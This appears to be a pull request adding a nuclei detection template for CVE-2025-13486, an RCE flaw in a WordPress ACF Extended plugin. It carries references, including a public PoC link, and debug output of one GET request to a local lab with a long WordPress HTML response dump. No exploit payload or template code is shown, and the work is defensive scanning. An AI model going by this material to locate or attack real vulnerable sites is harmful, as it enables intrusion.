nuclei-templates
nuclei-templates copied to clipboard
Published
4 months ago
•
projectdiscovery
projectdiscovery
Added CVE-2025-13486
/claim #14212
PR Information
[!NOTE] Vulnerable environment details shared via email.
- Added CVE-2025-13486
- References:
- https://github.com/0xanis/CVE-2025-13486-POC
- https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
- https://www.purple-ops.io/resources-hottest-cves/wordpress-acf-rce-flaw/
- https://nvd.nist.gov/vuln/detail/CVE-2025-13486
Template validation
- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)
Additional Details (leave it blank if not applicable)
debug
[ERR] GOOGLE_API_KEY env variable exists but GOOGLE_API_CX does not
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.5.1
projectdiscovery.io
[INF] Current nuclei version: v3.5.1 (latest)
[INF] Current nuclei-templates version: v10.3.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-13486] Dumped HTTP request for https://localhost/
GET / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
[DBG] [CVE-2025-13486] Dumped HTTP response https://localhost/
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 04 Dec 2025 06:46:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <https://localhost/index.php?rest_route=/>; rel="https://api.w.org/"
Pragma: no-cache
Server: Apache/2.4.65 (Debian)
Set-Cookie: PHPSESSID=7a062d141a46ed1df3763f558d0ecb0e; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/8.3.28
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name='robots' content='noindex, nofollow' />
<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
<title>wp-lab</title>
<link rel="alternate" type="application/rss+xml" title="wp-lab » Feed" href="https://localhost/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="wp-lab » Comments Feed" href="https://localhost/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/localhost\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.3"}};
/*! This file is auto-generated */
!function(s,n){var o,i,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),a=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===a[t]})}function u(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);for(var n=e.getImageData(16,16,1,1),a=0;a<n.data.length;a++)if(0!==n.data[a])return!1;return!0}function f(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\udedf")}return!1}function g(e,t,n,a){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):s.createElement("canvas"),o=r.getContext("2d",{willReadFrequently:!0}),i=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(function(e){i[e]=t(o,e,n,a)}),i}function t(e){var t=s.createElement("script");t.src=e,t.defer=!0,s.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",i=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){s.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+g.toString()+"("+[JSON.stringify(i),f.toString(),p.toString(),u.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"}),r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=function(e){c(n=e.data),r.terminate(),t(n)})}catch(e){}c(n=g(i,f,p,u))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
</script>
<style id='wp-block-site-title-inline-css'>
.wp-block-site-title{box-sizing:border-box}.wp-block-site-title :where(a){color:inherit;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit}
</style>
<style id='wp-block-page-list-inline-css'>
.wp-block-navigation .wp-block-page-list{align-items:var(--navigation-layout-align,initial);background-color:inherit;display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation .wp-block-navigation-item{background-color:inherit}.wp-block-page-list{box-sizing:border-box}
</style>
<link rel='stylesheet' id='wp-block-navigation-css' href='https://localhost/wp-includes/blocks/navigation/style.min.css?ver=6.8.3' media='all' />
<style id='wp-block-group-inline-css'>
.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-layout-constrained){position:relative}
</style>
<style id='wp-block-heading-inline-css'>
h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}
</style>
<style id='wp-block-paragraph-inline-css'>
.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:left;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em .1em 0 0;text-transform:uppercase}body.rtl .has-drop-cap:not(:focus):first-letter{float:none;margin-left:.1em}p.has-drop-cap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{rotate:180deg}
</style>
<style id='wp-block-post-featured-image-inline-css'>
.wp-block-post-featured-image{margin-left:0;margin-right:0}.wp-block-post-featured-image a{display:block;height:100%}.wp-block-post-featured-image :where(img){box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom;width:100%}.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{width:100%}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{background-color:#000;inset:0;position:absolute}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{background-color:initial}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{opacity:0}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{opacity:.1}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{opacity:.2}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{opacity:.3}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{opacity:.4}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{opacity:.5}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{opacity:.6}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{opacity:.7}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{opacity:.8}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}.wp-block-post-featured-image:where(.alignleft,.alignright){width:100%}
</style>
<style id='wp-block-post-title-inline-css'>
.wp-block-post-title{box-sizing:border-box;word-break:break-word}.wp-block-post-title :where(a){display:inline-block;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit}
</style>
<style id='wp-block-post-content-inline-css'>
.wp-block-post-content{display:flow-root}
</style>
<style id='wp-block-post-date-inline-css'>
.wp-block-post-date{box-sizing:border-box}
</style>
<style id='wp-block-post-template-inline-css'>
.wp-block-post-template{box-sizing:border-box;list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-post-template.is-flex-container{display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container>li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{width:calc(33.33333% - .83333em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{width:calc(25% - .9375em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{width:calc(16.66667% - 1.04167em)}}@media (max-width:600px){.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{grid-template-columns:1fr}}.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{float:right;margin-inline-end:0;margin-inline-start:2em}.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{float:left;margin-inline-end:2em;margin-inline-start:0}.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{margin-inline-end:auto;margin-inline-start:auto}
.... truncated
</script>
<script>
acf.data = {"acfe":{"forms":{"69312e45c8c84":{"cid":"69312e45c8c84","name":"testfield","id":16,"field_class":"","hide_error":false,"hide_unload":false,"hide_revalidation":false,"error_position":"above","error_class":"","messages":{"failure":"Validation failed","success":"Validation successful","error":"1 field requires attention","errors":"%d fields require attention"},"scroll":false,"hide_form":false,"success":false}},"version":"0.9.1.1","home_url":"https:\/\/localhost","is_admin":false,"is_user_logged_in":false},"select2L10n":{"matches_1":"One result is available, press enter to select it.","matches_n":"%d results are available, use up and down arrow keys to navigate.","matches_0":"No matches found","input_too_short_1":"Please enter 1 or more characters","input_too_short_n":"Please enter %d or more characters","input_too_long_1":"Please delete 1 character","input_too_long_n":"Please delete %d characters","selection_too_long_1":"You can only select 1 item","selection_too_long_n":"You can only select %d items","load_more":"Loading more results…","searching":"Searching…","load_fail":"Loading failed"},"google_map_api":"https:\/\/maps.googleapis.com\/maps\/api\/js?libraries=places&ver=3&callback=Function.prototype&language=en_US","datePickerL10n":{"closeText":"Done","currentText":"Today","nextText":"Next","prevText":"Prev","weekHeader":"Wk","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesMin":["S","M","T","W","T","F","S"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]},"dateTimePickerL10n":{"timeOnlyTitle":"Choose Time","timeText":"Time","hourText":"Hour","minuteText":"Minute","secondText":"Second","millisecText":"Millisecond","microsecText":"Microsecond","timezoneText":"Time Zone","currentText":"Now","closeText":"Done","selectText":"Select","amNames":["AM","A"],"pmNames":["PM","P"]},"colorPickerL10n":{"hex_string":"Hex String","rgba_string":"RGBA String"},"iconPickerA11yStrings":{"noResultsForSearchTerm":"No results found for that search term","newResultsFoundForSearchTerm":"The available icons matching your search query have been updated in the icon picker below."},"iconPickeri10n":{"dashicons-admin-appearance":"Appearance Icon","dashicons-admin-collapse":"Collapse Icon","dashicons-admin-comments":"Comments Icon","dashicons-admin-customizer":"Customizer Icon","dashicons-admin-generic":"Generic Icon","dashicons-admin-home":"Home Icon","dashicons-admin-links":"Links Icon","dashicons-admin-media":"Media Icon","dashicons-admin-multisite":"Multisite Icon","dashicons-admin-network":"Network Icon","dashicons-admin-page":"Page Icon","dashicons-admin-plugins":"Plugins Icon","dashicons-admin-post":"Post Icon","dashicons-admin-settings":"Settings Icon","dashicons-admin-site":"Site Icon","dashicons-admin-site-alt":"Site (alt) Icon","dashicons-admin-site-alt2":"Site (alt2) Icon","dashicons-admin-site-alt3":"Site (alt3) Icon","dashicons-admin-tools":"Tools Icon","dashicons-admin-users":"Users Icon","dashicons-airplane":"Airplane Icon","dashicons-album":"Album Icon","dashicons-align-center":"Align Center Icon","dashicons-align-full-width":"Align Full Width Icon","dashicons-align-left":"Align Left Icon","dashicons-align-none":"Align None Icon","dashicons-align-pull-left":"Align Pull Left Icon","dashicons-align-pull-right":"Align Pull Right Icon","dashicons-align-right":"Align Right Icon","dashicons-align-wide":"Align Wide Icon","dashicons-amazon":"Amazon Icon","dashicons-analytics":"Analytics Icon","dashicons-archive":"Archive Icon","dashicons-arrow-down":"Arrow Down Icon","dashicons-arrow-down-alt":"Arrow Down (alt) Icon","dashicons-arrow-down-alt2":"Arrow Down (alt2) Icon","dashicons-arrow-left":"Arrow Left Icon","dashicons-arrow-left-alt":"Arrow Left (alt) Icon","dashicons-arrow-left-alt2":"Arrow Left (alt2) Icon","dashicons-arrow-right":"Arrow Right Icon","dashicons-arrow-right-alt":"Arrow Right (alt) Icon","dashicons-arrow-right-alt2":"Arrow Right (alt2) Icon","dashicons-arrow-up":"Arrow Up Icon","dashicons-arrow-up-alt":"Arrow Up (alt) Icon","dashicons-arrow-up-alt2":"Arrow Up (alt2) Icon","dashicons-art":"Art Icon","dashicons-awards":"Awards Icon","dashicons-backup":"Backup Icon","dashicons-bank":"Bank Icon","dashicons-beer":"Beer Icon","dashicons-bell":"Bell Icon","dashicons-block-default":"Block Default Icon","dashicons-book":"Book Icon","dashicons-book-alt":"Book (alt) Icon","dashicons-buddicons-activity":"Activity Icon","dashicons-buddicons-bbpress-logo":"bbPress Icon","dashicons-buddicons-buddypress-logo":"BuddyPress Icon","dashicons-buddicons-community":"Community Icon","dashicons-buddicons-forums":"Forums Icon","dashicons-buddicons-friends":"Friends Icon","dashicons-buddicons-groups":"Groups Icon","dashicons-buddicons-pm":"PM Icon","dashicons-buddicons-replies":"Replies Icon","dashicons-buddicons-topics":"Topics Icon","dashicons-buddicons-tracking":"Tracking Icon","dashicons-building":"Building Icon","dashicons-businessman":"Businessman Icon","dashicons-businessperson":"Businessperson Icon","dashicons-businesswoman":"Businesswoman Icon","dashicons-button":"Button Icon","dashicons-calculator":"Calculator Icon","dashicons-calendar":"Calendar Icon","dashicons-calendar-alt":"Calendar (alt) Icon","dashicons-camera":"Camera Icon","dashicons-camera-alt":"Camera (alt) Icon","dashicons-car":"Car Icon","dashicons-carrot":"Carrot Icon","dashicons-cart":"Cart Icon","dashicons-category":"Category Icon","dashicons-chart-area":"Chart Area Icon","dashicons-chart-bar":"Chart Bar Icon","dashicons-chart-line":"Chart Line Icon","dashicons-chart-pie":"Chart Pie Icon","dashicons-clipboard":"Clipboard Icon","dashicons-clock":"Clock Icon","dashicons-cloud":"Cloud Icon","dashicons-cloud-saved":"Cloud Saved Icon","dashicons-cloud-upload":"Cloud Upload Icon","dashicons-code-standards":"Code Standards Icon","dashicons-coffee":"Coffee Icon","dashicons-color-picker":"Color Picker Icon","dashicons-columns":"Columns Icon","dashicons-controls-back":"Back Icon","dashicons-controls-forward":"Forward Icon","dashicons-controls-pause":"Pause Icon","dashicons-controls-play":"Play Icon","dashicons-controls-repeat":"Repeat Icon","dashicons-controls-skipback":"Skip Back Icon","dashicons-controls-skipforward":"Skip Forward Icon","dashicons-controls-volumeoff":"Volume Off Icon","dashicons-controls-volumeon":"Volume On Icon","dashicons-cover-image":"Cover Image Icon","dashicons-dashboard":"Dashboard Icon","dashicons-database":"Database Icon","dashicons-database-add":"Database Add Icon","dashicons-database-export":"Database Export Icon","dashicons-database-import":"Database Import Icon","dashicons-database-remove":"Database Remove Icon","dashicons-database-view":"Database View Icon","dashicons-desktop":"Desktop Icon","dashicons-dismiss":"Dismiss Icon","dashicons-download":"Download Icon","dashicons-drumstick":"Drumstick Icon","dashicons-edit":"Edit Icon","dashicons-edit-large":"Edit Large Icon","dashicons-edit-page":"Edit Page Icon","dashicons-editor-aligncenter":"Align Center Icon","dashicons-editor-alignleft":"Align Left Icon","dashicons-editor-alignright":"Align Right Icon","dashicons-editor-bold":"Bold Icon","dashicons-editor-break":"Break Icon","dashicons-editor-code":"Code Icon","dashicons-editor-contract":"Contract Icon","dashicons-editor-customchar":"Custom Character Icon","dashicons-editor-expand":"Expand Icon","dashicons-editor-help":"Help Icon","dashicons-editor-indent":"Indent Icon","dashicons-editor-insertmore":"Insert More Icon","dashicons-editor-italic":"Italic Icon","dashicons-editor-justify":"Justify Icon","dashicons-editor-kitchensink":"Kitchen Sink Icon","dashicons-editor-ltr":"LTR Icon","dashicons-editor-ol":"Ordered List Icon","dashicons-editor-ol-rtl":"Ordered List RTL Icon","dashicons-editor-outdent":"Outdent Icon","dashicons-editor-paragraph":"Paragraph Icon","dashicons-editor-paste-text":"Paste Text Icon","dashicons-editor-paste-word":"Paste Word Icon","dashicons-editor-quote":"Quote Icon","dashicons-editor-removeformatting":"Remove Formatting Icon","dashicons-editor-rtl":"RTL Icon","dashicons-editor-spellcheck":"Spellcheck Icon","dashicons-editor-strikethrough":"Strikethrough Icon","dashicons-editor-table":"Table Icon","dashicons-editor-textcolor":"Text Color Icon","dashicons-editor-ul":"Unordered List Icon","dashicons-editor-underline":"Underline Icon","dashicons-editor-unlink":"Unlink Icon","dashicons-editor-video":"Video Icon","dashicons-ellipsis":"Ellipsis Icon","dashicons-email":"Email Icon","dashicons-email-alt":"Email (alt) Icon","dashicons-email-alt2":"Email (alt2) Icon","dashicons-embed-audio":"Embed Audio Icon","dashicons-embed-generic":"Embed Generic Icon","dashicons-embed-photo":"Embed Photo Icon","dashicons-embed-post":"Embed Post Icon","dashicons-embed-video":"Embed Video Icon","dashicons-excerpt-view":"Excerpt View Icon","dashicons-exit":"Exit Icon","dashicons-external":"External Icon","dashicons-facebook":"Facebook Icon","dashicons-facebook-alt":"Facebook (alt) Icon","dashicons-feedback":"Feedback Icon","dashicons-filter":"Filter Icon","dashicons-flag":"Flag Icon","dashicons-food":"Food Icon","dashicons-format-aside":"Aside Icon","dashicons-format-audio":"Audio Icon","dashicons-format-chat":"Chat Icon","dashicons-format-gallery":"Gallery Icon","dashicons-format-image":"Image Icon","dashicons-format-quote":"Quote Icon","dashicons-format-status":"Status Icon","dashicons-format-video":"Video Icon","dashicons-forms":"Forms Icon","dashicons-fullscreen-alt":"Fullscreen (alt) Icon","dashicons-fullscreen-exit-alt":"Fullscreen Exit (alt) Icon","dashicons-games":"Games Icon","dashicons-google":"Google Icon","dashicons-grid-view":"Grid View Icon","dashicons-groups":"Groups Icon","dashicons-hammer":"Hammer Icon","dashicons-heading":"Heading Icon","dashicons-heart":"Heart Icon","dashicons-hidden":"Hidden Icon","dashicons-hourglass":"Hourglass Icon","dashicons-html":"HTML Icon","dashicons-id":"ID Icon","dashicons-id-alt":"ID (alt) Icon","dashicons-image-crop":"Crop Icon","dashicons-image-filter":"Filter Icon","dashicons-image-flip-horizontal":"Flip Horizontal Icon","dashicons-image-flip-vertical":"Flip Vertical Icon","dashicons-image-rotate":"Rotate Icon","dashicons-image-rotate-left":"Rotate Left Icon","dashicons-image-rotate-right":"Rotate Right Icon","dashicons-images-alt":"Images (alt) Icon","dashicons-images-alt2":"Images (alt2) Icon","dashicons-index-card":"Index Card Icon","dashicons-info":"Info Icon","dashicons-info-outline":"Info Outline Icon","dashicons-insert":"Insert Icon","dashicons-insert-after":"Insert After Icon","dashicons-insert-before":"Insert Before Icon","dashicons-instagram":"Instagram Icon","dashicons-laptop":"Laptop Icon","dashicons-layout":"Layout Icon","dashicons-leftright":"Left Right Icon","dashicons-lightbulb":"Lightbulb Icon","dashicons-linkedin":"LinkedIn Icon","dashicons-list-view":"List View Icon","dashicons-location":"Location Icon","dashicons-location-alt":"Location (alt) Icon","dashicons-lock":"Lock Icon","dashicons-marker":"Marker Icon","dashicons-media-archive":"Archive Icon","dashicons-media-audio":"Audio Icon","dashicons-media-code":"Code Icon","dashicons-media-default":"Default Icon","dashicons-media-document":"Document Icon","dashicons-media-interactive":"Interactive Icon","dashicons-media-spreadsheet":"Spreadsheet Icon","dashicons-media-text":"Text Icon","dashicons-media-video":"Video Icon","dashicons-megaphone":"Megaphone Icon","dashicons-menu":"Menu Icon","dashicons-menu-alt":"Menu (alt) Icon","dashicons-menu-alt2":"Menu (alt2) Icon","dashicons-menu-alt3":"Menu (alt3) Icon","dashicons-microphone":"Microphone Icon","dashicons-migrate":"Migrate Icon","dashicons-minus":"Minus Icon","dashicons-money":"Money Icon","dashicons-money-alt":"Money (alt) Icon","dashicons-move":"Move Icon","dashicons-nametag":"Nametag Icon","dashicons-networking":"Networking Icon","dashicons-no":"No Icon","dashicons-no-alt":"No (alt) Icon","dashicons-open-folder":"Open Folder Icon","dashicons-palmtree":"Palm Tree Icon","dashicons-paperclip":"Paperclip Icon","dashicons-pdf":"PDF Icon","dashicons-performance":"Performance Icon","dashicons-pets":"Pets Icon","dashicons-phone":"Phone Icon","dashicons-pinterest":"Pinterest Icon","dashicons-playlist-audio":"Playlist Audio Icon","dashicons-playlist-video":"Playlist Video Icon","dashicons-plugins-checked":"Plugins Checked Icon","dashicons-plus":"Plus Icon","dashicons-plus-alt":"Plus (alt) Icon","dashicons-plus-alt2":"Plus (alt2) Icon","dashicons-podio":"Podio Icon","dashicons-portfolio":"Portfolio Icon","dashicons-post-status":"Post Status Icon","dashicons-pressthis":"Pressthis Icon","dashicons-printer":"Printer Icon","dashicons-privacy":"Privacy Icon","dashicons-products":"Products Icon","dashicons-randomize":"Randomize Icon","dashicons-reddit":"Reddit Icon","dashicons-redo":"Redo Icon","dashicons-remove":"Remove Icon","dashicons-rest-api":"REST API Icon","dashicons-rss":"RSS Icon","dashicons-saved":"Saved Icon","dashicons-schedule":"Schedule Icon","dashicons-screenoptions":"Screen Options Icon","dashicons-search":"Search Icon","dashicons-share":"Share Icon","dashicons-share-alt":"Share (alt) Icon","dashicons-share-alt2":"Share (alt2) Icon","dashicons-shield":"Shield Icon","dashicons-shield-alt":"Shield (alt) Icon","dashicons-shortcode":"Shortcode Icon","dashicons-slides":"Slides Icon","dashicons-smartphone":"Smartphone Icon","dashicons-smiley":"Smiley Icon","dashicons-sort":"Sort Icon","dashicons-sos":"Sos Icon","dashicons-spotify":"Spotify Icon","dashicons-star-empty":"Star Empty Icon","dashicons-star-filled":"Star Filled Icon","dashicons-star-half":"Star Half Icon","dashicons-sticky":"Sticky Icon","dashicons-store":"Store Icon","dashicons-superhero":"Superhero Icon","dashicons-superhero-alt":"Superhero (alt) Icon","dashicons-table-col-after":"Table Col After Icon","dashicons-table-col-before":"Table Col Before Icon","dashicons-table-col-delete":"Table Col Delete Icon","dashicons-table-row-after":"Table Row After Icon","dashicons-table-row-before":"Table Row Before Icon","dashicons-table-row-delete":"Table Row Delete Icon","dashicons-tablet":"Tablet Icon","dashicons-tag":"Tag Icon","dashicons-tagcloud":"Tagcloud Icon","dashicons-testimonial":"Testimonial Icon","dashicons-text":"Text Icon","dashicons-text-page":"Text Page Icon","dashicons-thumbs-down":"Thumbs Down Icon","dashicons-thumbs-up":"Thumbs Up Icon","dashicons-tickets":"Tickets Icon","dashicons-tickets-alt":"Tickets (alt) Icon","dashicons-tide":"Tide Icon","dashicons-translation":"Translation Icon","dashicons-trash":"Trash Icon","dashicons-twitch":"Twitch Icon","dashicons-twitter":"Twitter Icon","dashicons-twitter-alt":"Twitter (alt) Icon","dashicons-undo":"Undo Icon","dashicons-universal-access":"Universal Access Icon","dashicons-universal-access-alt":"Universal Access (alt) Icon","dashicons-unlock":"Unlock Icon","dashicons-update":"Update Icon","dashicons-update-alt":"Update (alt) Icon","dashicons-upload":"Upload Icon","dashicons-vault":"Vault Icon","dashicons-video-alt":"Video (alt) Icon","dashicons-video-alt2":"Video (alt2) Icon","dashicons-video-alt3":"Video (alt3) Icon","dashicons-visibility":"Visibility Icon","dashicons-warning":"Warning Icon","dashicons-welcome-add-page":"Add Page Icon","dashicons-welcome-comments":"Comments Icon","dashicons-welcome-learn-more":"Learn More Icon","dashicons-welcome-view-site":"View Site Icon","dashicons-welcome-widgets-menus":"Widgets Menus Icon","dashicons-welcome-write-blog":"Write Blog Icon","dashicons-whatsapp":"WhatsApp Icon","dashicons-wordpress":"WordPress Icon","dashicons-wordpress-alt":"WordPress (alt) Icon","dashicons-xing":"Xing Icon","dashicons-yes":"Yes Icon","dashicons-yes-alt":"Yes (alt) Icon","dashicons-youtube":"YouTube Icon"},"mimeTypeIcon":"https:\/\/localhost\/wp-includes\/images\/media\/default.png","mimeTypes":{"jpg|jpeg|jpe":"image\/jpeg","gif":"image\/gif","png":"image\/png","bmp":"image\/bmp","tiff|tif":"image\/tiff","webp":"image\/webp","avif":"image\/avif","ico":"image\/x-icon","heic":"image\/heic","heif":"image\/heif","heics":"image\/heic-sequence","heifs":"image\/heif-sequence","asf|asx":"video\/x-ms-asf","wmv":"video\/x-ms-wmv","wmx":"video\/x-ms-wmx","wm":"video\/x-ms-wm","avi":"video\/avi","divx":"video\/divx","flv":"video\/x-flv","mov|qt":"video\/quicktime","mpeg|mpg|mpe":"video\/mpeg","mp4|m4v":"video\/mp4","ogv":"video\/ogg","webm":"video\/webm","mkv":"video\/x-matroska","3gp|3gpp":"video\/3gpp","3g2|3gp2":"video\/3gpp2","txt|asc|c|cc|h|srt":"text\/plain","csv":"text\/csv","tsv":"text\/tab-separated-values","ics":"text\/calendar","rtx":"text\/richtext","css":"text\/css","vtt":"text\/vtt","dfxp":"application\/ttaf+xml","mp3|m4a|m4b":"audio\/mpeg","aac":"audio\/aac","ra|ram":"audio\/x-realaudio","wav|x-wav":"audio\/wav","ogg|oga":"audio\/ogg","flac":"audio\/flac","mid|midi":"audio\/midi","wma":"audio\/x-ms-wma","wax":"audio\/x-ms-wax","mka":"audio\/x-matroska","rtf":"application\/rtf","pdf":"application\/pdf","class":"application\/java","tar":"application\/x-tar","zip":"application\/zip","gz|gzip":"application\/x-gzip","rar":"application\/rar","7z":"application\/x-7z-compressed","psd":"application\/octet-stream","xcf":"application\/octet-stream","doc":"application\/msword","pot|pps|ppt":"application\/vnd.ms-powerpoint","wri":"application\/vnd.ms-write","xla|xls|xlt|xlw":"application\/vnd.ms-excel","mdb":"application\/vnd.ms-access","mpp":"application\/vnd.ms-project","docx":"application\/vnd.openxmlformats-officedocument.wordprocessingml.document","docm":"application\/vnd.ms-word.document.macroEnabled.12","dotx":"application\/vnd.openxmlformats-officedocument.wordprocessingml.template","dotm":"application\/vnd.ms-word.template.macroEnabled.12","xlsx":"application\/vnd.openxmlformats-officedocument.spreadsheetml.sheet","xlsm